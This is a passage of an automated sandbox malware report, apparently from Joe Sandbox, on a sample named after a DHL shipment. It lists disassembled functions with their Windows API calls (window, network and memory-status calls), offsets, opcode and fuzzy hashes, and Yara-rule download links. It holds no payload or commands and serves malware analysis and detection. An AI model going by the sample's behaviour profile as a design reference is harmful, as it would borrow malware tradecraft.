                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2889604237-0
                                                                                            • Opcode ID: 9274509d0aad12867ae37c70cd8a5baae0b3a5cc5f99c7165bea72d27ca4f33e
                                                                                            • Instruction ID: 5f7f0978f0d4d4b2bdd2c2533df45ff02f3df16d141c0e15d43f5cf634ea82ca
                                                                                            • Opcode Fuzzy Hash: 9274509d0aad12867ae37c70cd8a5baae0b3a5cc5f99c7165bea72d27ca4f33e
                                                                                            • Instruction Fuzzy Hash: B3E01AB4C00208DFCB41AFA4D908A6DBBB1FB58310F148519E806E7250CB389941AF51
                                                                                            Function 0087D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDesktopWindow.USER32 ref: 0087D86C
                                                                                            • GetDC.USER32(00000000), ref: 0087D876
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0087D882
                                                                                            • ReleaseDC.USER32(?), ref: 0087D8A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2889604237-0
                                                                                            • Opcode ID: a5d6fa7bed626dee6bbe1e5290fa5fddfab0ad1616288231c126edc1b0c5c4d9
                                                                                            • Instruction ID: d059abfb91f278682e2b2024eddf8d657eb4660df3a84e52821db69ceaa0c554
                                                                                            • Opcode Fuzzy Hash: a5d6fa7bed626dee6bbe1e5290fa5fddfab0ad1616288231c126edc1b0c5c4d9
                                                                                            • Instruction Fuzzy Hash: 21E046B4C00204EFCF50AFA8E80CA6DBBB1FB58310F108508F80AE7350CB385902AF90
                                                                                            Function 00894D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00827620: _wcslen.LIBCMT ref: 00827625
                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00894ED4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Connection_wcslen
                                                                                            • String ID: *$LPT
                                                                                            • API String ID: 1725874428-3443410124
                                                                                            • Opcode ID: f4fe6de02cdd866d4d179ff1e3a089cc4e2578bb9085973d2aa96498018e52b4
                                                                                            • Instruction ID: ff051cf834ca83092635cbb66bcb63e3dfdd7ec33990f6433db964b005e7955b
                                                                                            • Opcode Fuzzy Hash: f4fe6de02cdd866d4d179ff1e3a089cc4e2578bb9085973d2aa96498018e52b4
                                                                                            • Instruction Fuzzy Hash: 0C915F75A002159FCB14EF58C484EAABBF1FF44318F189099E40A9F762DB35ED86CB91
                                                                                            Function 0084E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 0084E30D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorHandling__start
                                                                                            • String ID: pow
                                                                                            • API String ID: 3213639722-2276729525
                                                                                            • Opcode ID: 165107a8b808bb37ebc09034354bdf0a1c5668aa17064c56175bfdc09b7bdff4
                                                                                            • Instruction ID: 3822686646e65efe9cd497dc6973e60107725bc6dde450ba0bdab027b89c5840
                                                                                            • Opcode Fuzzy Hash: 165107a8b808bb37ebc09034354bdf0a1c5668aa17064c56175bfdc09b7bdff4
                                                                                            • Instruction Fuzzy Hash: 97515F71A0C20996CB167B18E9427793BB4FB40B42F30C9A8F8D5C23EDDF358C899646
                                                                                            Function 0083E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #
                                                                                            • API String ID: 0-1885708031
                                                                                            • Opcode ID: ffb453376ca34024ab0f401798603564514e1774f84cfa8bb093e2f4626deea9
                                                                                            • Instruction ID: 3e1cc4ff526ac4d43b4cbf3c442be1c4498bd1ad56367afe2a307c27a8da34b9
                                                                                            • Opcode Fuzzy Hash: ffb453376ca34024ab0f401798603564514e1774f84cfa8bb093e2f4626deea9
                                                                                            • Instruction Fuzzy Hash: CF51233550024ADFDF19DF68C081ABA7BA8FF69310F2480A5F895DB2D4D634DD52CBA1
                                                                                            Function 0083F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000), ref: 0083F2A2
                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0083F2BB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                            • String ID: @
                                                                                            • API String ID: 2783356886-2766056989
                                                                                            • Opcode ID: b1dd33a6173cf0842549aa33d5e092232d98f2f24acc92857fc6a6a6c1e31eae
                                                                                            • Instruction ID: 940ef99dfdc94f00697064833349ce4dcc5ebdbcbcb4a119ff294c63f1d779fd
                                                                                            • Opcode Fuzzy Hash: b1dd33a6173cf0842549aa33d5e092232d98f2f24acc92857fc6a6a6c1e31eae
                                                                                            • Instruction Fuzzy Hash: 57513871418B449BD320AF55E886BAFBBF8FF84300F81885DF19981195EF708969CB67
                                                                                            Function 008A5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 008A57E0
                                                                                            • _wcslen.LIBCMT ref: 008A57EC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                            • String ID: CALLARGARRAY
                                                                                            • API String ID: 157775604-1150593374
                                                                                            • Opcode ID: 452bcda55f35c64a608014b21daac2c3cc61c503370756601d2c66bb97ca7bca
                                                                                            • Instruction ID: e7e16f196a98526605538c4c34014f0a2a75b261540fe56a7ceb572a7e86cc5c
                                                                                            • Opcode Fuzzy Hash: 452bcda55f35c64a608014b21daac2c3cc61c503370756601d2c66bb97ca7bca
                                                                                            • Instruction Fuzzy Hash: 8C419031E002099FDB14DFA9C8819BEBBB5FF5A724F144069E505E7352EB349D81CBA1
                                                                                            Function 0089D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 0089D130
                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0089D13A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CrackInternet_wcslen
                                                                                            • String ID: |
                                                                                            • API String ID: 596671847-2343686810
                                                                                            • Opcode ID: e4b7934a8a59ac8be74c978c60e607f8fdfbaca67285d8339a9730691b0e31ef
                                                                                            • Instruction ID: 225912ede53b100d9c2eb66e6c4afa991fc92aaaf28f0b336c1e1891b065367b
                                                                                            • Opcode Fuzzy Hash: e4b7934a8a59ac8be74c978c60e607f8fdfbaca67285d8339a9730691b0e31ef
                                                                                            • Instruction Fuzzy Hash: 1E313875D01219ABCF15EFA8DC85AEEBFB9FF04300F140019F815A6162EB31AA56CB65
                                                                                            Function 008B356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 008B3621
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 008B365C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$DestroyMove
                                                                                            • String ID: static
                                                                                            • API String ID: 2139405536-2160076837
                                                                                            • Opcode ID: 1c123c00fbc0327a871f1f124a19efc62fb6348cf05a9a9febbf6f9d0c6f7fc2
                                                                                            • Instruction ID: 222d63a2c02b08de2e1340759d309061d7db65e50889f5a86b3dac59c0cdc6dd
                                                                                            • Opcode Fuzzy Hash: 1c123c00fbc0327a871f1f124a19efc62fb6348cf05a9a9febbf6f9d0c6f7fc2
                                                                                            • Instruction Fuzzy Hash: AC319A71110608AEDB24DF38DC80EFB73A9FF99724F008619F8A5D7290DA30AD91DB60
                                                                                            Function 008B4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 008B461F
                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008B4634
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: '
                                                                                            • API String ID: 3850602802-1997036262
                                                                                            • Opcode ID: d51a50c21c4c2eefb9538732532845842311fdfd6e507265ee13baa1d5f4ff1a
                                                                                            • Instruction ID: 08bbe90ebafeb51fc40c31cd851e29c069d34ecd6db28b53167a0bb0f3b41d5a
                                                                                            • Opcode Fuzzy Hash: d51a50c21c4c2eefb9538732532845842311fdfd6e507265ee13baa1d5f4ff1a
                                                                                            • Instruction Fuzzy Hash: D6313874A0061A9FDF14CFA9C981BEABBB5FF19300F10516AE904EB352D770A941CF90
                                                                                            Function 008B31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008B327C
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008B3287
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: Combobox
                                                                                            • API String ID: 3850602802-2096851135
                                                                                            • Opcode ID: da317c9af60543a63dca742ce45b07b67eac989fc55bdc87ebb9c3cfcde88881
                                                                                            • Instruction ID: 2739738d3338af87d9e7cfd10cf9f50c47458bc2c090c6b68c36854586868bd2
                                                                                            • Opcode Fuzzy Hash: da317c9af60543a63dca742ce45b07b67eac989fc55bdc87ebb9c3cfcde88881
                                                                                            • Instruction Fuzzy Hash: 2B11B271300208BFEF219E98DC85EFB376AFB993A5F104228F918E7390D6719D518760
                                                                                            Function 008B3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0082600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0082604C
                                                                                              • Part of subcall function 0082600E: GetStockObject.GDI32(00000011), ref: 00826060
                                                                                              • Part of subcall function 0082600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0082606A
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008B377A
                                                                                            • GetSysColor.USER32(00000012), ref: 008B3794
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                            • String ID: static
                                                                                            • API String ID: 1983116058-2160076837
                                                                                            • Opcode ID: 9df6982538b6602eca067a24adee983519a1c117bbee84a143fbbdb211e7200f
                                                                                            • Instruction ID: 9e06698028e1a1aeb7df9e767eab391d8321a7b756aefba69b7ce92122bc4edc
                                                                                            • Opcode Fuzzy Hash: 9df6982538b6602eca067a24adee983519a1c117bbee84a143fbbdb211e7200f
                                                                                            • Instruction Fuzzy Hash: BB1129B2610209AFDF00DFA8CC45EFA7BB8FB08354F004624F955E2250EB35E851DB60
                                                                                            Function 0089CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0089CD7D
                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0089CDA6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$OpenOption
                                                                                            • String ID: <local>
                                                                                            • API String ID: 942729171-4266983199
                                                                                            • Opcode ID: 6a5be7330560c7d50e9c3a1b50a602a2cb6fd329c16e66a263f0ae425148ee38
                                                                                            • Instruction ID: 407a114bbad1595c458ae3c4b76d511d91b2d66a2c02cbc2899940a48e82301b
                                                                                            • Opcode Fuzzy Hash: 6a5be7330560c7d50e9c3a1b50a602a2cb6fd329c16e66a263f0ae425148ee38
                                                                                            • Instruction Fuzzy Hash: 1F11C6B1205635BEDB345B668C45EE7BE6CFF127A8F144226B109C3180D7759840D6F0
                                                                                            Function 008B3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 008B34AB
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008B34BA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                            • String ID: edit
                                                                                            • API String ID: 2978978980-2167791130
                                                                                            • Opcode ID: a4a0e823911dc9f662692de1a68d9758f80e222ea87d9b8b8b078737cc456054
                                                                                            • Instruction ID: b5446d6e13f7988d80c94136ecd52e7efddf96df45fffa94f90cc9ea69f2e661
                                                                                            • Opcode Fuzzy Hash: a4a0e823911dc9f662692de1a68d9758f80e222ea87d9b8b8b078737cc456054
                                                                                            • Instruction Fuzzy Hash: 59118F71100108ABEB218E68DC44AFB3B6AFF25378F504324F961D32D0C771DD519758
                                                                                            Function 00886C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 00886CB6
                                                                                            • _wcslen.LIBCMT ref: 00886CC2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                            • String ID: STOP
                                                                                            • API String ID: 1256254125-2411985666
                                                                                            • Opcode ID: 3c77fe85e0a617dfcee14caeffd3930fe4a06297008d0253e5c9d945c0ee5f0d
                                                                                            • Instruction ID: 0b7ba18655c75195485f27c7ddc4b91df8c5bbd25dce59af4b00115848e99a29
                                                                                            • Opcode Fuzzy Hash: 3c77fe85e0a617dfcee14caeffd3930fe4a06297008d0253e5c9d945c0ee5f0d
                                                                                            • Instruction Fuzzy Hash: 2F01C032A1052A8BCB21BFFDDC809BF77A6FF61714B110538E862D6191FA32D960C751
                                                                                            Function 00881CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 00883CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00883CCA
                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00881D4C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 624084870-1403004172
                                                                                            • Opcode ID: 5ec1940cb8852b8960f46bc2eee15736a55597580dd8b9bea1af2ad55b889638
                                                                                            • Instruction ID: 8b445cd513807c23668fa28becf9df820a6224268b700b22751d5e03fba47881
                                                                                            • Opcode Fuzzy Hash: 5ec1940cb8852b8960f46bc2eee15736a55597580dd8b9bea1af2ad55b889638
                                                                                            • Instruction Fuzzy Hash: 6D019E75601228AB8B08BBA8DD559FE73A8FB56360F040619F862E72C1EE30590987A1
                                                                                            Function 00881BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 00883CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00883CCA
                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00881C46
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
